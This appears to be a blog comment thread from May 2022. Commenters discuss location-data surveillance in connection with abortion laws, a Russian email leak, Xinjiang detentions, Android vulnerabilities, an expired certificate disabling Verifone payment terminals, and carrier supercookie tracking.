Comments

SpaceLifeForm May 27, 2022 5:42 PM

Frankly, Russia, We don’t give a damn.

hxtps://www.reuters.com/technology/russia-opens-cases-against-google-other-foreign-tech-over-data-storage-2022-05-27/

Ted May 27, 2022 9:47 PM

40+ US congress members sent a letter to Google asking for reforms to data collection and retention practices. The lawmakers are worried how location data could be used to identify women seeking abortions, particularly Android users. The letter notes that:

Google received 11,554 geofence warrants in 2020.

I’d like to know what options are available.

https://www.theverge.com/2022/5/24/23140279/democrat-letter-google-location-data-abortion-surveillance-geofence-warrants

JonKnowsNothing May 27, 2022 10:58 PM

@Ted

re: I’d like to know what options are available.

Can you clarify what you would like to know?

Warrants are issued by LEAs. They are generally expected to be based on some law or prohibited activity that the name(s) are alleged to be involved in. That doesn’t mean they cannot be issued for totally or near totally bogus reasons that at some later date, will see the warrant and charges dropped (after the big PR announcements). The charges can also be molded as things progress add-ons and enhancements and changes in particular legal codes being applied.

Firms of all sorts, including high tech receive many warrants. Hi Tech companies often publish reports but there are some warrants that have muzzles on them and those won’t be included in the counts.

There will be approx 50% of the USA, where 50% of the population in those States, maybe engaged in defined illegal activity when seeking medical treatments. For some States that have this legislation, the cases are criminal and they are subject to the same processes as any other criminal case involving the “death of a person”.

The other States in this category have a different “non enforcement” condition to their laws and violating the law by seeking medical treatment is not enforced by the State. The State has issued a Bounty Hunter Program similar to the bounty programs they pass to kill wolves, bears, mountain lions and other animals deemed to challenge human activities. So the 50% of the populations in those states are subject to the exact same tracking methods used by ranchers, hunters and other big game hunters to collect those fees.

You might want to research Trail Cameras and Fishing Radar systems that are sold in Sporting Goods stores.

Trail cameras take timed images using special LEDs that will illuminate the picture but not “light up” the area like a standard flash. These are mounted throughout a hunter’s targeted range (with permissions etc etc) and capture the movement of the “target animal”. The images can then be uploaded to several sites which will use AI/ML to analyze the image and can provide GPS maps and tracking of specific “trophy” animals. The AI/ML can produce probable location maps of where the “trophy” eats, rests, drinks and their movement thru the day or season. Not unlike what conservation scientists do, but in this case the goal is to kill the trophy animal without too much hiking and wandering about. You go right to their favorite spot. Set up your mono-pod, dial in the range and Bob’s Your Uncle.

Fishing radar works to provide the same information, by tracking schools of fish in a lake, pond so you can drop your hook right in the middle of the Big Fish and skip a lot of dead casting when the fish are not there.

Big industrial fishing fleets use the same stuff but on a much bigger area with 100% take and a 90% by catch throw away.

So, 50% of the USA States have targeted 50% of their State populations, some for criminal proceedings and some for a Bounty Hunter program.

Ted May 27, 2022 11:23 PM

@JonKnowsNothing

Can you clarify what you would like to know?

How could Google block the collection of location data that could be incriminating. From the letter:

No law requires Google to collect and keep records of its customers’ every movement. Apple has shown that it is not necessary for smartphone companies to retain invasive tracking databases of their customers’ locations.

SpaceLifeForm May 28, 2022 1:16 AM

@ Ted, JonKnowsNothing

LEA does not need Google or Apple to provide that location data tracking.

The cellcos can do that. If one has to go out of state to get an abortion, then they should leave their cell phone at home.

I really can not imagine a scenario where some LEA in Texas gets a warrant to get Google to provide information about person XX that they think is/was pregnant that they think may have crossed the border.

Seriously, get real. This makes no sense.

If only the congresscritters understood the tech.

Robin May 28, 2022 2:10 AM

“A group of Russian hackers is believed to be behind the release of a cache of emails obtained from a former director of MI6 and other Brexiters unhappy with Theresa May’s failure to negotiate a “clean” EU exit deal.

The former spymaster told Reuters, which first reported the story: “I am well aware of a Russian operation against a Proton [email] account which contained emails to and from me.”

Its goals, the leaked document says, were to “block any deal” to leave the EU arising from the Chequers white paper, to “ensure that we leave on clean WTO terms” and “if necessary remove this prime minister and replace with one fit for purpose”.”

hxtps://www.theguardian.com/uk-news/2022/may/26/hard-brexit-plans-ex-m16-richard-dearlove-hacked-leaked-russians

Leaving aside any questions about the ex-Head of MI6 meddling in politics in such a way, the report appears to show that: (1) in 2018 the ex-head of MI6 chose to use Protonmail, and (2) the hackers seem to have succeeded. Although as far as I know, messages sent by protonmail are only secured if sender and recipient are both using protonmail.

Robin May 28, 2022 2:21 AM

On re-reading, that line: “a Proton account” .. “emails to and from me” does not necessarily imply that it was his account. My bad.

SpaceLifeForm May 28, 2022 4:22 AM

@ Robin, Clive

Partygate

This is some heavy misdirection, IMO. Not on your part, BTW.

The Proton email account described may have been controlled by Boris Johnson.

There is no reason that Russian hackers would be saying this.

Be careful reading anything from Reuters these days.

SpaceLifeForm May 28, 2022 4:56 AM

@ Robin, Clive, ALL

Partygate quantum physics four picoseconds of liminal time

It’s the same on both sides of the pond.

Tory Party is GOP, both brainwashed, blackmailed, bought by Russia.

Absolutely no spine. Even via X-ray. Nothing there.

Anyway, I hope you can enjoy a bit of British humour/sarcasm/snark here:

hxtps://www.theguardian.com/commentisfree/2022/may/27/boris-johnson-sue-gray-partygate

Ted May 28, 2022 7:13 AM

@SpaceLifeForm, JonKnowsNothing

Re: Google location data and abortions

Seriously, get real. This makes no sense.

I know you say that LEAs asking Google for location data makes no sense, especially since “everyone” can track location data: cellcos, apps, public wifi, stingrays, malware, video surveillance… and on and on.

But why would LEAs not ask Google? Are they going to have a gentleperson’s agreement not to query Google about location data and abortion activities?

I honestly feel like the congress people are providing Google a “courtesy” by making this request. If – and ultimately when – Google provides location data in response to a warrant targeting these “criminal” women, it’s going to get extremely uncomfortable and damn straight litigious.

Clive Robinson May 28, 2022 7:37 AM

@ SpaceLifeForm, Robin,

Re : Partygate, quantum physics four picoseconds of liminal time

Not so much “owned by Putin” as “boned by Putin” as was Boris’s predecessor “Handbag Mk II and kitten heal” Mrs May…

With the Startrek and other ScFi comparisons tucked in the article…

This might cause a small smile, just imagine Boris as that fat Klingon[1] restaurant ownerin Deep Space 9 that serves bad food and sings even worse opera[2] 😉

[1] In Boris’s case there has to be a “When the fat lady sings” diva joke in there somewhere…

[2] Ron Taylor (for it was he) was actually way more successful than Boris,

https://heavy.com/entertainment/star-trek/who-played-the-singing-klingon-restaurant-owner-on-ds9/

JonKnowsNothing May 28, 2022 8:08 AM

@ Ted, @SpaceLifeForm, @All

re: Hunting for Big Game Bounty

LEAs do not need “permission” from Google to track people.

Google and other high tech companies of all types track people as part of their business processes.

Corporations in the USA are subject to subpoena warrants for Third Party Documents which include things like CDRs from telcos and receipts from STAPLES.

LEAs may need parallel construction to bring legal cases to court, if they have done their tracking by “other means” DRTBX, STINGRAY.

Having the person leave their cell phone at home, begs the question of how to leave all cell phones and all tracking at home.

  • It’s in the car, its in the pocket of the driver, it’s in a neighboring car, it’s at the stop lights, it’s in roving vehicles that specialize in random imaging of traveling persons. You cannot get on a plane without being tracked and filmed, you cannot go to a mall without being On Camera or buy a take away burger without their being some recording of the interaction.

There are the 2 scenarios:

For criminal cases, Google has to have a good push back reason to object to a subpoena warrant.

For Bounty Hunter cases, Google would not have to provide information outside their standard business methods. If they sell your data to others, then they can sell your data to a Bounty Hunter. If not Google, there are many data warehouse brokers who will, plus there are enough LEA-Connected tracking systems that will provide the same data. It’s only a matter of which corporation.

As for targeting, we know a good deal about how that works: Warheads on Foreheads. If you want a trophy bonus, you go where the trophy target is likely to be. All roads may lead to Rome, but there are only so many roads to the destination. These paths are already well known and well monitored and have been used to kill medical personnel in the past.

It’s one reason, some of the SCOTUS justices got a bit nervous when they ran into their own personal experience of finding out that their “privacy” wasn’t there. An open window shade, a step out the front door, a walk to the garage, turning onto the street and having a parade follow you to work.

If you know what the destination is, Bob’s Your Uncle, just wait at the bottleneck.

afaik, the Bounty Hunter program does not require the Hunter to interact with the trophy, all they have to do is file a claim against the selected trophy. (1)

re: I really can not imagine a scenario where some LEA in Texas gets a warrant to get Google to provide information about person XX that they think is/was pregnant that they think may have crossed the border.

This is exactly what the criminal laws are designed to do. It makes great PR on election days. It was done in the past and it will be done in the coming months.

If you wonder how they will know to target a person?

That’s the same way Ads are targeted.
iirc(badly)

A parent learned their daughter was pregnant because she had ordered a pregnancy test from an on-line drug store.

The parent got an email ad from the drug store:

  * Congratulations on your pregnancy!
  * We have a sale on baby diapers!

Of a secondary interest: SCOTUS recently blocked State cases from rising into Federal Courts seeking relief from inadequate Defense Attorney at Trial Time.

This blocks State Criminal cases from Federal Court review.

  • Being innocent is not enough to have a Federal Court review
  • There is no prohibition in the US Constitution against executing innocent people
  • If the State Court finds you guilty; guilty you will remain.
  • The State can apply any penalties their laws provides, including death sentences.

===

1) iirc(badly) IANAL I think these claims run in Civil Courts not Criminal Courts and are $10,000/per. This is the financial limit for many “Small Claims Courts”, where people represent themselves. There is no limitation on the number of claims that can be filed.

Clive Robinson May 28, 2022 9:36 AM

@ SpaceLifeForm, JonKnowsNothing, Ted,

I really can not imagine a scenario where some LEA in Texas gets a warrant to get Google to provide information about person XX that they think is/was pregnant that they think may have crossed the border.

You are jumping two steps ahead instead of just one.

Remember that changes in peoples web searches frequently give away significant information about their health.

So checking peoples “searches” would provide a lot of information, such as searches for out of area / state women’s health services.

After that step pulling travel information gives the potential time and date of the neo-crime.

So going to Alphabet’s Google for both search history and location information is a “one stop” for such LEA’s.

But also remember they do not need a warrant for “Third Party Business Records”.

fib May 28, 2022 11:15 AM

@All

Re Privacy, abortion

Of course everyone here knows that it takes very few data points to infer pregnancy:

  • Alice buys a pregnancy test
  • Alice stops drinking
  • Alice starts yoga classes

Bonus: Alice announces pregnancy on Facebook[1]

(*) In ~9 months we want to see Alice’s baby, else investigate/prosecute

[1] Red flags:

  • Alice didn’t post results of pregnancy test
  • Alice takes a break from social media
  • Alice starts visiting certain websites
  • Alice does etc…

Investigate/prosecute NOW

No need to be LEA. Any citizen can have access to powerful ETtL and data analysis tools. Nowadays, this kind surveillance is certainly within the reach of any institution formed by “concerned citizens” [anti-abortion groups in this case].

Bloated Cow May 28, 2022 12:17 PM

Here is another take on reproductive surveillance:

hxxps://themarkup.org/newsletter/hello-world/the-rise-of-reproductive-surveillance

Having performed IT work in an LEA related office for a while, I think most LEAs have plenty of serious crimes to investigate already without trying to catch women trying to circumvent anti-abortion laws. That is why the laws were written that private citizens can bring the claims.

lurker May 28, 2022 1:37 PM

Location data tracks the device, not the person. Unfortunately the telcos and LEAs will be believed, not the person.

In the case of data from Google, I would want some serious verification of just what it was that they were tracking.

lurker May 28, 2022 1:40 PM

The filter doesn’t like my story of how Google thinks my phone is two different devices 200km apart, or how they could lawsplain that . . .

Clive Robinson May 28, 2022 3:59 PM

@ Bloated Cow, ALL,

I think most LEAs have plenty of serious crimes to investigate already without trying to catch women trying to circumvent anti-abortion laws.

Most LEAs have significant work loads, thus they prioritize crime types to be investigated by four things,

1, Political POV of crime,
2, Public POV of crime,
3, Seriousness of crime,
4, Cost of investigation.

Obviously 1&2 are highly variable and depend on Politics, Religion and MSM.

The seriousness of a crime 3 is also actually a “point of view”…

Some consider abortion “murder” which makes it one of the “high crimes” as far as they are concerned.

But consider also the definition of “abortion” some use, of “termination of fetus”, also applies to any woman on the pill engaging in what are called “healthy sexual relations” with their partner.

Which brings us to the cost of investigation 4, which could by the simple enactment of a State Law make it mandatory for Alphabet / Google and other Social Media to report to LEAs,”Marketing Data” on every woman they consider “pregnant”…

It would be very inexpensive to set up and in some states like Texes with real nut-bars running the place, real easy for Politicians to pass the legislation and start the round ups. In fact with “Private Prisons” it would be highly profitable for certain known friends of the nut-bars.

lurker May 28, 2022 4:02 PM

@SpaceLifeForm, re Quantum Phone

Are you saying Google have solved Schroedinger’s paradox? They can see simultaneously both the dead cat and the live one? Please explain that to a Judge.

JonKnowsNothing May 28, 2022 4:50 PM

@Clive, @All

re: … State Law make it mandatory for Alphabet / Google and other Social Media to report to LEAs,”Marketing Data” on every woman they consider “pregnant”

iirc(badly)
A while back when the roundup of a certain group of people in Mainland China started, and this grouping were sent to “education camps”, there were numerous reports of how data tracking was being done. There were various reports of mandatory smartphone-device use, with periodic “patriotic” check ins, social scoring for reading the “Greater thoughts of the day”, face id, eye tracking and a load of other “apps” that had to be active and used.

There was a report about a specific field in one the databases that was being populated. It was claimed that the name of the field was badly translated into English and the information in that field was innocuous.

The field title indicated it was tracking monthly cycles and pregnancies. If the field date did not change, after n-days or n-weeks the woman might be taken to a medical person to be checked.

It was not said what the medical person was checking for or what actions would be taken on the findings.

In another country such investigations have also taken place but without the use of tracking devices.

A regular checkup with a MD was scheduled for a particular group of people at a clinic. The people would come and bring their children and families for the medical checkups and given medicines as needed.

The female members of this group also received a regular injection of something “innocuous” (~vitamin booster).

When the birth rate fell in this particular group demographic, someone got curious. That curiosity lead to a review and a report and exposure that something ODD was happening at the clinic, with the findings that the MDs were enacting current policy.

In both cases, the groups have fallen far off the headlines, and in both cases the rebuttals were swift and pointed, with the pointy end directed at anyone getting too nosy.

To quote US Supreme Court Justice Clarence Thomas:

[what will happen] if people are unwilling to “live with outcomes we don’t agree with”

Ted May 28, 2022 8:45 PM

From six skin tones to ten.

Many tech co’s have been using the 6-tone Fitzpatrick scale for their visual algorithms. Now Google is starting to incorporate a new 10-tone standard: the Monk Skin Tone (MST) scale.

Google is continuing work to validate the Monk Skin Tone scale in places like Brazil, India, Mexico, and Nigeria, according to a source familiar with the matter.

More details are expected in an upcoming academic research article.

https://www.wired.com/story/google-monk-skin-tone-scale-computer-vision-bias

Erdem Memisyazici May 29, 2022 1:53 AM

Never assume a wild animal’s mood. At least it wasn’t a deadlier predator. The number of trainers eaten or mauled is surprising who approach a wild animal with the assumption that it is safe to do so based on a visual inspection. They are called wild for a reason.

ResearcherZero May 29, 2022 4:01 AM

“We discovered that the framework, which is used by numerous apps, had a “BROWSABLE” service activity that an attacker could remotely invoke to exploit several vulnerabilities that could allow adversaries to implant a persistent backdoor or take substantial control over the device.”

“…the framework was authorized to access system resources and perform system-related tasks, like adjusting the device’s audio, camera, power, and storage controls. Moreover, we found that the framework was being used by default system applications to leverage its self-diagnostic capabilities, demonstrating that the affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.”

“As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device.”

“The apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers,”
https://www.microsoft.com/security/blog/2022/05/27/android-apps-with-millions-of-downloads-exposed-to-high-severity-vulnerabilities/

CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601
https://www.mce.systems/

Clive Robinson May 29, 2022 4:21 AM

@ JonKnowsNothing, ALL,

That curiosity lead to a review and a report and exposure that something ODD was happening at the clinic

Not the first nor I suspect the last.

Have a look back on the history of venerial disease and it’s treatment.

Specifically syphilis, which if not treated causes brain damage. It’s been suggested from his later life behaviours that English King Henery VIII suffered from it.

Well even when a medical cure was found and available, it was deliberately withheld from certain racial groupings. Even though federal law required treatment be given (for the good reason of keeping it out of the whole population).

The result was that whilst mental illness and other related symptoms passed out of the other racial groups it stayed in the untreated group…

Now consider what would happen with ML if the known cause was kept out of the training data but certain of the mental illness symptoms that turn up on police reports were not.

Now consider the “water treatment” scandals of recent times where chimicals known to have neuro-toxilogical disadvantages were way way higher in areas where certain racial groups are in higher concentration. When found out the excuses given were “fiscal” but that does not ring true…

ResearcherZero May 29, 2022 4:55 AM

@ALL

Do not bite the hand that feeds you!

People are much easier to control when they have children, …and if they don’t, then it’s time for a little re-education. As long as everyone is busy arguing over ideological catch calls, they’ll never read the finer points of new legislation, and more importantly be able to afford legal representation that does.

The “Handmaid’s Tail” is on the blacklist for a very good reason, too many of the working class now have access to literature, and without the guiding light of their superiors they may become agitated, confused and easily led astray by other malign influences. They may likely begin demanding higher wages, health care, education, and higher taxes for the wealthy. Such demands all threaten profits, the placement of hazardous industry, and it’s waste. The Devil We Know, respect and worship.

You should all be thankful we began planning to move production to locations such as Xinjiang long ago.
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2072821/

“Despite the veneer of legality, many of those in Xinjiang’s prisons are ordinary people who were convicted for going about their lives and practicing their religion.”

many people have been convicted and imprisoned without committing a genuine offense. These formal prosecutions are distinct from those arbitrarily detained in unlawful “political education” facilities
https://www.hrw.org/news/2021/02/24/china-baseless-imprisonments-surge-xinjiang

“In 2017, detentions of Uighurs, Kazakhs, Hui, and other minorities began to escalate. The first wave targeted Uighur imams and the religiously devout. Soon, prominent academics, novelists, and film directors were also taken into custody. Police and security officers used broad pretexts to justify the detentions, including travelling abroad, having a beard, and owning a prayer rug.”
https://www.newyorker.com/news/a-reporter-at-large/china-xinjiang-prison-state-uighur-detention-camps-prisoner-testimony

Beijing considers “over two million” Uyghurs to be impacted by “extremist” religious thought, and therefore potential targets for re-education. Police spreadsheets indicate that in 2018, over 12 percent of the adult population of one majority-Uyghur county was in an internment facility.
https://victimsofcommunism.org/xinjiang-police-files-press-release/

internment camp security drills, general security drills, safety exercises, surveillance camera screenshots, and so on
https://www.xinjiangpolicefiles.org/images-of-security-drills-and-police-work/

like prisoners in war
https://xinjiang.amnesty.org/wp-content/uploads/2021/06/ASA_17_4137-2021_Full_report_ENG.pdf

bottle of lotion May 29, 2022 5:04 AM

Headquartered in Finland, Nokia builds telecoms networks that enable phones and other internet-enabled devices to communicate with one another.

Asked when he thinks the world will move away from using smartphones to using smart glasses and other devices that are worn on the face, Lundmark said it will happen before 6G arrives.

“By then, definitely the smartphone as we know it today will not anymore be the most common interface,” he said. “Many of these things will be built directly into our bodies.”

Clive Robinson May 29, 2022 6:39 AM

@ bottle of lotion,

“Many of these things will be built directly into our bodies.”

They already are. The simple fact is that the drive for low energy low cost data systems in the consumer market has made the resulting chips a “design-in” for implanted medical electronics.

But also with phones it was made into the basic premise of an episode of Futurama last century with the MomCorp Eye-Phone (Futurama Season 6 Episode 3 : Attack of the Killer App).

https://www.ign.com/wikis/futurama/Eyephone

Winter May 29, 2022 9:48 AM

@ResearcherZero

many people have been convicted and imprisoned without committing a genuine offense.

A very simple summary is:
China is a racist country that uses apartheid policies and genocide [1] to rid itself of non-Han minorities.

Any talk about “extremism” or “crimes” are just as vacuous as the accusations against Ukrainians, Jews, and black people in the Soviet Union, Germany, and Rhodesia, respectively.

[1] Forced sterilization of Uighur women.

Winter May 29, 2022 9:59 AM

@Erdem

They are called wild for a reason.

It takes many generations to domesticate the descendants of wild animals [1]. In some species it might be impossible. Zebras are infamous for their treacherous and murderous behavior. No one succeeded in reliably domesticating them.

Also, wild species harbor new pathogens. Eg, outbreaks of monkeypox have been traced back to imported “pet” animals.

[1] ht-tps://www.sciencealert.com/that-famous-fox-domestication-study-may-have-been-wrong-about-domestication-syndrome

Clive Robinson May 29, 2022 2:23 PM

@ Winter, Erdem,

It takes many generations to domesticate the descendants of wild animals [1].

Some though the live with us are neither wild nor domesticated.

We in effect come to a relationship with them, and them with us.

A sub species of the “Felidae” are Domestic cats “Felis catus” they live on a spectrum with three recognised points,

1, house cat
2, farm cat
3, feral cat

And a cat can exist in any one, two or all during it’s life time.

Similar are some of the “Mustelidae” including ferrets “Mustela furo” probably descended from larger european ferrets / pole cats “Mustela putorius” and otters in the subfamily “lutrinae”

Ferrets like cats were mainly only domesticated sufficciently to be “usefull to man” in dealing with mix, rats, rabits and similar vermin it is only in more recent times have they become domesticated as “pets”.

There are many stories about ferrets and biting people, but in general providing you handle them frequently and play with them to give them activities to sait their curiosity they are “playful”. Yes they will nip and playfully chew but I’ve not yet been “bitten” even by larger males. Ferrets unlike cats are generally easier to train and respond well to “affection”, and can be “house trained”.

vas pup May 29, 2022 3:58 PM

Two Professors Found What Creates a Mass Shooter. Will Politicians Pay Attention?
https://www.yahoo.com/news/really-consistent-pathway-society-stop-185445896.html

If a satellite falls on your house, space law protects you – but there are no legal penalties for leaving junk in orbit
https://www.yahoo.com/news/satellite-falls-house-space-law-122543931.html

“Imagine that, instead of landing in the ocean, the recent Chinese rocket crashed into your house while you were at work. What would current law allow you to do?

According to the 1967 Outer Space Treaty and 1972 Liability Convention – both adopted by the United Nations – this would be a government-to-government issue. The treaties declare that states are internationally responsible and liable for any damage caused by a spacecraft – !!!even if the damage was caused by a private company from that state. According to these laws, your country wouldn’t even need to prove that someone had done something wrong if a space object or its component parts caused damage on the surface of the Earth or to normal aircraft in flight.”

JonKnowsNothing May 29, 2022 4:23 PM

@Clive, @Winter, @All

re: It takes many generations to domesticate the descendants of wild animals

As noted this doesn’t work in practice. You can raise multitudes of fast generation animals and never hit “domesticated”.

One measure that maybe used is:

  • Can the animal forage for itself without human assistance. (1)

Nearly every “domesticated” animal can forage for themselves, after a fashion, provided they are in an environment where there is something to eat. Being locked into a corral with no food, doesn’t count.

Another marker, but not consistent, is:

  • will the animal return to human control without enticements or control methods.

Many animals will do this, even if the human in control does not treat them well.

Most horses will return to their fallen rider after the horse has bucked them off. But there are always some horses who prefer to Head To The Barn leaving their riders Shanks Mare.

There are variations of what domestication means but a very common version is:

  • can we farm them, to kill them.

Animals that have low tolerance for human control (lions, tigers, elephants) often develop a very poor relationships, even with their Keepers. People regularly get killed because they forget that from the animal’s PoV, the Keeper is just a nearby snack waiting to get munched on.

The only animals that still remain under the title of “domesticated” are the ones we kill: to eat, for science, for by products etc. The animals rarely get any chance at all to decide if they LIKE humans and want to hang around them. Depending on the animal, it’s 6weeks to 18months before death.

A side issue of this version of domestication, is the near elimination of “previously domesticated animals of the same type but different breed”. The various types of chickens, pigs, goats, and cattle.

Today’s Market Chicken, isn’t the same type of chicken that fed previous generations back thru antiquity. Coq au vin and Meat Marinades made those meats edible (or digestible) after hours of soaking and simmering.

It’s another known fault in modern mass farm production and industrial food supply.

  • Reliance on only a few genetic variations, with humans controlling all genetics of many species both “wild and domestic”.

===

1) Corn, or Maize is “domesticated”. Humans have genetically selected ears of corn for high density kernels. Normally, the kernels would mature and then fall from the cob reseeding the plant. Modern corn kernels are too densely packed and the kernels do not drop from the cob. This allow mass planting and mass harvesting and mass storage of the full cobs.

Maize Corn Crib Husking Shucking.

Clive Robinson May 29, 2022 6:09 PM

@ Bruce, ALL,

I agree; the diver deserved it.

The “presenter” is not realy a “diver” and he deserved quite a bit more than just the warning nip he got.

Jig line fishermen who catch the “Red Devil” know full well just how dangerous the Humboldt can be even out of water,

https://www.liveabout.com/fishing-for-giant-humboldt-squid-2929309

There is footage around on the internet showing humboldt attacking each other, and it’s not the sort of melee you would want to be close to let alone be part of.

ResearcherZero May 29, 2022 10:01 PM

magical “quantum phone”

“a mobile intelligence system that would be a great addition to your investigative and special support offices”
“Turn your target’s smartphone into an intelligence gold mine,”
requires no cooperation from AT&T, Verizon, Apple or Google
https://www.documentcloud.org/documents/6888574-Westbridge-NSO-Group-Brochure-for-Phantom.html

the US Commerce Department blacklisted NSO Group, accusing it of providing spyware to foreign governments who then used the tools “to maliciously target journalists, embassy workers, and activists.”
https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/

no backdoors

“Those candidate algorithms that NIST is running the competitions on all appear strong, secure, and what we need for quantum resistance,”
“We’ve worked against all of them to make sure they are solid.”
https://www.bloomberg.com/news/articles/2022-05-13/nsa-says-no-backdoor-in-new-encryption-scheme-for-us-tech

Quantum Computing and Post-Quantum Cryptography FAQs
https://media.defense.gov/2021/Aug/04/2002821837/-1/-1/1/Quantum_FAQs_20210804.PDF

http://www.nist.gov/public_affairs/releases/joint_quantum_institute.cfm

Penetrating Hard Targets
https://www.washingtonpost.com/world/national-security/nsa-seeks-to-build-quantum-computer-that-could-crack-most-types-of-encryption/2014/01/02/8fff297e-7195-11e3-8def-a33011492df2_story.html

The LQC offers a mechanism for collaborative research between LPS and academia, industry, FFRDCs, and Government Laboratories.
https://www.qubitcollaboratory.org/nsa-launches-lps-collaboratory/

just giving the old squid jig a twirl

Sumadelet May 30, 2022 2:00 AM

I think this deserves a little more publicity:

Verifone H5000 card terminals, used extensively for point of payment card validation in Germany stop working due to an expired certificate. If the terminal is turned off and back on again to reset it, the expired certificate prevents a software update to resolve the problem. The end result is that people cannot pay for goods and services via that terminal. The link is in German.

h++ps://www.borncity.com/blog/2022/05/27/strung-der-verifone-h5000-ec-kartenlesegerte-einige-insights-zur-zertifikateproblematik/

Englsh version

h++ps://borncity.com/win/2022/05/25/nation-wide-disruption-with-verifon-h5000-payment-terminals-in-germany/

Sumadelet May 30, 2022 2:13 AM

Re: Expired certificate in German card payment terminals:

A useful twitter thread in English explaining the issue(s):

h++ps://twitter.com/jwildeboer/status/1530227390286290944

I agree with people who maintain that there should be ‘graceful’ expiry, where the process around certificate use incorporates warnings in advance of the actual expiry date so you don’t get sudden cut-offs for no apparent reason relayed to the end user.

Leon Theremin May 30, 2022 9:05 AM

Here is a rumor about Mark Zuckerberg’s security spending:

“Last I heard, Mark spends ~$24M/yr. on his security detail. He’s got very thick glass installed in his house. 2 foot thick, but I can’t confirm that. It’s not just bullet proof, it’s RPG proof, or something. The optical distortions are quite real through that much silicon and plastic.”

https://news.ycombinator.com/item?id=31328382

I suspect the thick glass is less for physical security and more for electromagnetic security. Optical distortions in non visible wavelengths would ensure outside radar won’t receive useful signal back.

If this was a custom install, not seen even in military bases, tracking other houses with similar glass (or tracking the builder and looking at the clients) should reveal a very interesting clique of people.

Quantry May 30, 2022 12:46 PM

@ Clive Robinson, re #comment-405481

…with “Private Prisons” it would be highly profitable for certain known friends of the nut-bars…

Agreed, but not just private, and not just prisons. Keep in mind the signiFicant motivations for brownie point seeking in the political realm, and penalties for those who scorn it:

h–ps://www.harpercollins.ca/9781443465366/indian-in-the-cabinet

Now, imagine if yer NOT an Attorney General with a staff of 5000 specialists.

Canis familiaris May 30, 2022 4:15 PM

@Leon Theremin

the 2-foot thick glass might be acrylic, as used in the spectacularly large displays in public aquariums. Some of those are 60 cm thick.

https: //www. reynoldspolymer. com/category/aquariums-zoos/
https: //www. advanced-aquariums. com/acrylic/

Alternatively, it could be a layered laminate material, as used in ‘bullet-proof’ screens in banks and military vehicles, but I’m not sure if they are manufactured in that thickness.

SpaceLifeForm May 31, 2022 12:09 AM

@ Sumadelet

https://nitter.net/jwildeboer/status/1531363454648569856#m

Some newer points he made.

The check definitely fails when a H5000 without the December update reboots. And triggers tej Secure State. Which renders the device unusable for most payment functions.

Those H5000 without the December 2021 update that were switched on before 2022-05-24 and NOT powered off go into some sort of limbo state where the lose the CertFile(s) that allow the payment app to work and connect to the auth/payment backend. BUT

I do not see any post from him regarding the ‘BUT’, BUT maybe it will be easier to recover if no poweroff occurs now. The terminals do have RS-232 and USB. So, it may be that a new certificate could be pushed to the terminal, which then could allow full recovery. I don’t see the retailers waiting much longer as they can not afford to lose sales.

Looks like no battery though.

hxtps://manualzz.com/doc/27658506/h5000-data-sheet

ResearcherZero May 31, 2022 2:34 AM

TristPiD

Vodafone is piloting a new advertising ID system called TrustPid, which will work as a persistent user tracker at the mobile Internet Service Provider (ISP) level.
Vodafone plans to assign a fixed ID to each customer and associate all user activity with it. The ID will be based on a number of parameters, so that the system will be able to maintain persistence. Then, the mobile ISP creates a personal profile based on that ID and helps advertisers serve targeted ads to each customer.

The new system is in test phase in Germany and is intended to be impossible to bypass from within the web browser settings or through cookie blocking or IP address masking.
https://www.spiegel.de/netzwelt/netzpolitik/trustpid-die-rueckkehr-der-super-cookies-a-6ea53d94-5996-4d6b-aed5-dfb5f51ab942

a “license plate for your brain”

“while these trackers didn’t contain personal information, such as a name or phone number, they could be easily used to identify a person by monitoring their Web habits and cross-referencing it with information that a person volunteers online”
https://www.pbs.org/newshour/nation/verizon-supercookies-spark-calls-federal-investigation

“Opt Out” does not work, the tracking ID is permanent (it’s in the fine print)

“TURN, an online advertising company that is common on Google, Facebook, and Yahoo, was using the Verizon supercookie to retrieve and revive deleted cookies. These “zombie-cookies” were overriding users’ opt-out preferences.”
https://www.techdirt.com/2015/01/15/remember-that-undeletable-super-cookie-verizon-claimed-wouldnt-be-abused-yeah-well-funny-story/

“the opt-out mechanism for browsing is browser and device specific. That means you must opt out for each broswer on each device that you use.”

“Finally, clearing or deleting your browser’s cookies ‘may inadvertently delete the Turn opt-out cookie, and you may need to renew your opt-out choice for that browser,’ the company notes. Likewise, you’ll have to opt out all over again if you reset your device’s advertising identifier.”

This does not work either, ‘device advertising identifiers’ are easily aggregated.

https://clark.com/technology/verizon-supercookie-turn-inc-opt-out/

Vodafone has done it before…

August 20, 2015

“The American privacy organisation Access Now has conducted an international investigation into the use of supercookies and has discovered that Vodafone is using them on its Dutch network, the paper says.”

After a great deal of fuss, the technology is no longer used in the US, Access Now says. But its use has moved to other countries, including Spain, Canada, Peru and the Netherlands.
https://www.expatica.com/nl/uncategorized/dn-dutch-vodafone-brings-supercookies-to-the-netherlands-4705/

Verizon’s supercookie scheme…

August 17, 2015

AT&T and Verizon were able to track their customers—even when users were roaming internationally or activated private browsing modes—by injecting code called tracking headers into the data sent from users’ devices.
https://www.theatlantic.com/politics/archive/2015/08/how-phone-companies-used-supercookies-to-track-customers-web-browsing/458016/

Oct. 30, 2014

“The data can be used by any site – even those with no relationship to the telecoms — to build a dossier about a person’s behavior on mobile devices – including which apps they use, what sites they visit and for how long.”
https://www.propublica.org/article/somebodys-already-using-verizons-id-to-track-users

“inserting a string of about 50 letters, numbers, and characters into data flowing between these customers and the websites they visit”
https://www.wired.com/2014/10/verizons-perma-cookie/

March 7, 2016

For the past three years, Verizon has been using a so-called ‘supercookie’ to track users and sell this information to outside advertising partners. Now, the FCC is levying a $1.35 million fine and requiring Verizon to offer consumers the ability to opt-out of its various tracking programs.

For two years, the supercookie — which is actually called Unique Identifier Header, or UIDH — program tracked users in secret using technology similar to a tracking cookie — only this tracking cookie couldn’t be cleared.

Verizon started using the UIDH program in 2012 to serve better-targeted ads on its own advertising platforms. It wasn’t until 2014 when Verizon first made mention of its use of supercookies by burying the information on an FAQ page.
https://thenextweb.com/news/fcc-drops-the-hammer-on-verizon-over-supercookie-usage

Am I Being Tracked
https://www.accessnow.org/aibt/

the use of tracking headers worldwide and our recommendations for governments, carriers, websites, intergovernmental bodies, and researchers
